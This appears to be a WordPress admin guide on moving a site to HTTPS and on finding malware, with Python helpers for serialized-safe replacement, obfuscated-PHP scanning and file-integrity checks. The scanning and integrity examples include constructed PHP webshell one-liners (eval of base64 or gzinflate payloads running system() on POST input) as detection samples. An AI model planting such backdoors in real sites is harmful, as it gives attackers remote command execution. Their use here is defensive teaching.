Migrating your WordPress site to SSL

There are two steps to migrating your WordPress site over to SSL (https instead of http) after you have set up your certificate and web server configuration.

The first is relatively easy: update your Settings > General and change the WordPress Address (URL) and Site Address (URL) from http to https.

The second part is a bit trickier.

Basically, for SSL to work correctly you want to avoid mixed content. This is where a page served via https (SSL) still pulls in some of its resources via http (non-SSL). When this happens your browser won't show the site as being 100% SSL: passive content such as images costs you the padlock and produces a warning that differs from browser to browser, and active content such as scripts, stylesheets and iframes is blocked outright by modern browsers, so parts of the site simply stop working. Either is enough to deter users who are expecting the "green" secure padlock.

To fix this, you need to find and replace references to non-SSL content (hardcoded with http://) in two places — your code and your database.

For your code, the first place to check is your theme code and settings (including URLs pasted into the Customizer, widgets and menus). Look for and replace any instances of http:// with https://. Where a URL points at your own site it is better still to stop hardcoding it and use home_url(), get_template_directory_uri() and the other WordPress URL functions, which return whatever scheme the site is configured with. Be careful with links to third-party sites: only switch those to https:// if the other site actually serves it.

You can use your browser's developer tools to check for files that are not loading via https://: the console lists each one as a "Mixed Content" warning, and the Network tab shows which requests still go out over http://. Note too that these might be external resources and scripts (e.g. external JavaScript libraries, Google Fonts etc.), which a search and replace of your own domain will not touch; each needs to be switched to the https:// URL the provider offers. This can also be an issue in plugins, particularly when authors hardcode the absolute URL with http://.

For your database, use a tool like Better Search & Replace (or WP-CLI's `wp search-replace`) to search your WordPress site for references to http://<yoursite>.com and replace them with https://<yoursite>.com. Use a WordPress-aware tool rather than a raw SQL REPLACE(): many options, theme mods and post meta are stored as PHP-serialized arrays that record each string's length inline, and a plain text replace leaves those lengths wrong, so PHP can no longer unserialize the value and the setting silently disappears. Take a database backup first, and do a dry run (`--dry-run` in WP-CLI) before committing the change.
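As an added example (not code from the post, Better Search & Replace or WP-CLI), the two halves of the search-and-replace step in one script: a grep for hardcoded http:// URLs in theme or plugin source that separates your own domain from external resources, and a replace that is safe on PHP-serialized values because it re-computes each string's length. The theme snippet and the serialized option value are constructed samples, and the domain example.com is an assumption.

```python
"""Added example: mixed-content hunting for a WordPress HTTPS migration.

Two helpers, neither of which is shipped by WordPress or the tools named
in the post:
  * find_http_references() - the grep you run over theme/plugin code.
  * replace_serialized()   - a search/replace that keeps PHP-serialized
    option values valid, which is why a WordPress-aware tool beats a raw
    SQL REPLACE().
"""
import re

# Deliberately loose match for an http:// URL inside source text.
_HTTP_URL = re.compile(r"http://[^\s'\"<>()]+")

# A PHP serialized string token: s:<byte length>:"
_STR_TOKEN = re.compile(rb's:(\d+):"')


def find_http_references(source: str, site_host: str) -> list:
    """Return (line_number, url, is_external) for every hardcoded http:// URL.

    External resources (CDN scripts, Google Fonts, ...) are flagged separately
    because a site-wide replace of your own domain will never fix them.
    """
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for url in _HTTP_URL.findall(line):
            host = url[len("http://"):].split("/", 1)[0]
            hits.append((lineno, url, host != site_host))
    return hits


def replace_serialized(blob: bytes, old: bytes, new: bytes) -> bytes:
    """Replace old->new in a value that may be PHP-serialized.

    Walks the blob left to right. Each s:N:"..." token is consumed using its
    declared byte length N (which is correct in the *input*), the replacement
    is applied to the content, and the token is re-emitted with the new byte
    length. Everything between tokens (array/int/bool structure, or a plain
    non-serialized value such as post_content) gets an ordinary replace.
    """
    out = bytearray()
    pos = 0
    while True:
        m = _STR_TOKEN.search(blob, pos)
        if m is None:
            out += blob[pos:].replace(old, new)
            return bytes(out)
        out += blob[pos:m.start()].replace(old, new)
        length = int(m.group(1))
        start = m.end()
        content = blob[start:start + length]
        if blob[start + length:start + length + 2] != b'";':
            # Not a real token (e.g. the text 's:3:"' inside prose): copy it
            # through untouched and keep scanning after it.
            out += blob[m.start():m.end()]
            pos = m.end()
            continue
        # Double-serialized data (a serialized array stored as a string) is
        # handled by recursing so the inner lengths stay correct too.
        if content.startswith((b"a:", b"s:", b"O:")):
            content = replace_serialized(content, old, new)
        else:
            content = content.replace(old, new)
        out += b's:%d:"%s";' % (len(content), content)
        pos = start + length + 2


def serialized_lengths_ok(blob: bytes) -> bool:
    """True if every s:N:"..." token of a serialized value has a correct N.

    This is exactly the check a naive REPLACE() fails: PHP's unserialize()
    returns false and WordPress quietly loses the option.
    """
    pos = 0
    while True:
        m = _STR_TOKEN.search(blob, pos)
        if m is None:
            return True
        end = m.end() + int(m.group(1))
        if blob[end:end + 2] != b'";':
            return False
        pos = end + 2


# --- Constructed samples (not from any real site) --------------------------
OLD, NEW = b"http://example.com", b"https://example.com"
SAMPLE_THEME = (
    'wp_enqueue_style("x", "http://example.com/wp-content/themes/x/a.css");\n'
    '<link href="http://fonts.googleapis.com/css?family=Lato">\n'
)
# A theme_mods-style option: the logo URL's length (27) is recorded inline.
SAMPLE_OPTION = (b'a:2:{s:11:"header_logo";s:27:"http://example.com/logo.png";'
                 b's:7:"tagline";s:14:"Just a site :)";}')

if __name__ == "__main__":
    for hit in find_http_references(SAMPLE_THEME, "example.com"):
        print(hit)
    naive = SAMPLE_OPTION.replace(OLD, NEW)
    safe = replace_serialized(SAMPLE_OPTION, OLD, NEW)
    print("naive valid:", serialized_lengths_ok(naive))   # False
    print("safe  valid:", serialized_lengths_ok(safe))    # True
```

The naive replacement leaves `s:27:"https://example.com/logo.png"` behind, one byte short of the real length, which is the corruption Better Search & Replace and `wp search-replace` exist to avoid.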

Scanning Your Server for Malware

If you've been unfortunate enough to be targeted by hackers who have added malware to your web server, here are a few Linux CLI tools you can use to troubleshoot.

The first is maldet (Linux Malware Detect), which can be paired with Clam Antivirus (ClamAV) to scan for malware. Here's a good guide on how to do that.

Note you can usually install maldet via tools like yum or apt too, or from the upstream tarball. The key is to make sure it is running together with ClamAV, and that both signature sets are kept up to date (freshclam for ClamAV, maldet -u for maldet's own). You can also get it to alert you and automatically quarantine suspicious files by setting email_alert and quarantine_hits in conf.maldet; a scan of the web root is then just maldet -a /path/to/site.

Another tool, which is much better at finding hacked PHP code (which is usually obfuscated), is PHP malware finder (php-malware-finder). You'll notice that hacked PHP files aren't plain PHP code, but have instead been encoded (e.g. base64, typically wrapped in eval() or gzinflate()) to make them unreadable without decoding.

This can be cloned to the server and run from the CLI (it is a set of YARA rules, so yara needs to be installed). Just a note that it will pick up a lot of false positives depending on your app (e.g. WordPress, where legitimate plugins embed base64 images and fonts), and you'll need to work through these yourself.
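To make the "encoded PHP" point concrete, here is an added example (my own simplified signatures, not php-malware-finder's YARA rules) that flags the usual obfuscation patterns and unwraps an eval(base64_decode(...)) or eval(gzinflate(base64_decode(...))) chain so you can read what the payload actually does. The PHP snippets are constructed samples, including the deliberately clean one that shows why base64_decode on its own is not a signal.

```python
"""Added example (not php-malware-finder's code): a small signature scanner
for obfuscated PHP plus a decoder for the eval(<decoders>("blob")) pattern.
"""
import base64
import codecs
import os
import re
import zlib

# Hypothetical signatures. Each is a weak signal on its own; the combination,
# and what the decoded payload does, is what tells you a file is hostile.
SIGNATURES = [
    # eval() fed directly by a decoder: the classic one-line backdoor.
    ("eval_of_decoder", re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I)),
    # A long base64 run. Legitimate code (inline icons, fonts) triggers this
    # too, which is where the false positives the post mentions come from.
    ("long_base64_blob", re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")),
    # preg_replace() with the /e modifier evaluates the replacement as code.
    ("preg_replace_e_modifier", re.compile(
        r"preg_replace\s*\(\s*['\"]/.*?/[a-z]*e[a-z]*['\"]", re.I)),
    # Calling a function whose name arrives in the request: $_GET["f"](...)
    ("dynamic_call_from_request", re.compile(
        r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(", re.I)),
]

_FUNC_CHAIN = re.compile(r"(base64_decode|gzinflate|str_rot13|strrev)\s*\(", re.I)
_BLOB = re.compile(r"['\"]([A-Za-z0-9+/=]{16,})['\"]")


def scan_php(source: str) -> list:
    """Return the names of the signatures that match this PHP source."""
    return [name for name, rx in SIGNATURES if rx.search(source)]


def decode_payload(source: str):
    """Unwrap eval(<decoders>("blob")) and return the plaintext PHP, or None.

    Decoders appear outermost-first in the source, so they are applied in
    reverse. Wrappers this does not know are left for manual analysis.
    """
    blob = _BLOB.search(source)
    if blob is None:
        return None
    data = blob.group(1).encode()
    for func in reversed([f.lower() for f in _FUNC_CHAIN.findall(source[:blob.start()])]):
        if func == "base64_decode":
            data = base64.b64decode(data)
        elif func == "gzinflate":            # PHP gzinflate() == raw DEFLATE
            data = zlib.decompress(data, -15)
        elif func == "str_rot13":
            data = codecs.encode(data.decode("latin-1"), "rot_13").encode("latin-1")
        elif func == "strrev":
            data = data[::-1]
    return data.decode("utf-8", "replace")


def scan_tree(root: str):
    """Yield (path, findings) for every .php file under root that matches."""
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = scan_php(fh.read())
                if findings:
                    yield path, findings


# --- Constructed samples (not real malware from any site) -------------------
def _deflate(data: bytes) -> bytes:
    c = zlib.compressobj(9, zlib.DEFLATED, -15)   # raw DEFLATE, what gzinflate expects
    return c.compress(data) + c.flush()

PAYLOAD = "if (isset($_POST['c'])) { system($_POST['c']); }"
SAMPLE_EVAL_B64 = '<?php eval(base64_decode("%s")); ?>' % base64.b64encode(PAYLOAD.encode()).decode()
SAMPLE_LAYERED = '<?php eval(gzinflate(base64_decode("%s"))); ?>' % base64.b64encode(_deflate(PAYLOAD.encode())).decode()
SAMPLE_LONG = '<?php $_GET["f"](base64_decode("%s")); ?>' % base64.b64encode((PAYLOAD * 7).encode()).decode()
SAMPLE_PREG = '<?php preg_replace("/.*/e", $_POST["p"], ""); ?>'
SAMPLE_CLEAN = '<?php $logo = base64_decode(get_option("my_plugin_logo")); echo esc_url($logo); ?>'

if __name__ == "__main__":
    for label, src in [("eval+b64", SAMPLE_EVAL_B64), ("layered", SAMPLE_LAYERED),
                       ("long", SAMPLE_LONG), ("preg", SAMPLE_PREG), ("clean", SAMPLE_CLEAN)]:
        print(label, scan_php(src))
    print(decode_payload(SAMPLE_LAYERED))
```

Run scan_tree() over wp-content and read the decoded payload of every hit before deleting anything: a plugin that base64-embeds an icon and a one-line webshell both trip long_base64_blob, but only one of them decodes to a system() call on request input.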

Don't forget to also have something like [All in One WP Security and Firewall](https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/) installed to lock down your WordPress site and to scan for and alert you to file changes.

As a final measure, it helps if your application code is kept under version control on the server using a tool like git. A plain git status then shows any untracked or modified files, which you can investigate and quarantine. Two caveats: make sure the .git directory is not reachable over the web (it leaks your full source and history if it is), and remember that an attacker with write access to the site can also rewrite the local repository, so keep a copy of it somewhere they cannot reach to compare against.
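For servers where git is not available, here is an added example (not from the post) of the same check done with a hash manifest: record a SHA-256 for every file once, store that baseline off the box, and later diff the live tree against it to get the added, deleted and modified lists that git status would show. The site tree it builds under a temporary directory, and the tampering it simulates, are constructed for the demonstration.

```python
"""Added example (not part of the post): a file-integrity baseline that gives
the same "what changed since I last looked?" answer as `git status`, without
needing git on the box. Paths and contents below are constructed.
"""
import hashlib
import os
import tempfile
from pathlib import Path


def build_manifest(root) -> dict:
    """Map every file under root (relative POSIX path) to its SHA-256 hex digest."""
    root = Path(root)
    manifest = {}
    for dirpath, _, filenames in os.walk(root):   # os.walk also sees dotfiles
        for name in filenames:
            path = Path(dirpath) / name
            manifest[path.relative_to(root).as_posix()] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def diff_manifest(baseline: dict, current: dict) -> dict:
    """Untracked, deleted and modified files: the three sections of git status."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "deleted": sorted(baseline.keys() - current.keys()),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
    }


def demo() -> dict:
    """Baseline a tiny constructed site, tamper with it, and report the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        theme = root / "wp-content" / "themes" / "mytheme"
        uploads = root / "wp-content" / "uploads"
        theme.mkdir(parents=True)
        uploads.mkdir(parents=True)
        (root / "index.php").write_text("<?php require __DIR__ . '/wp-blog-header.php';\n")
        (theme / "functions.php").write_text("<?php // theme setup\n")
        (uploads / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0 not really a jpeg")

        baseline = build_manifest(root)   # in real life: copy this off the server

        # Simulated compromise: a backdoor appended to the theme, and a
        # dropper planted where only media should live.
        with open(theme / "functions.php", "a") as fh:
            fh.write('eval(base64_decode($_POST["x"]));\n')
        (uploads / ".cache.php").write_text("<?php // dropper\n")

        return diff_manifest(baseline, build_manifest(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

With git you would normally ignore wp-content/uploads and cache directories to keep the noise down; do the same here, but keep alerting on any .php file that appears under them, because that is where droppers land.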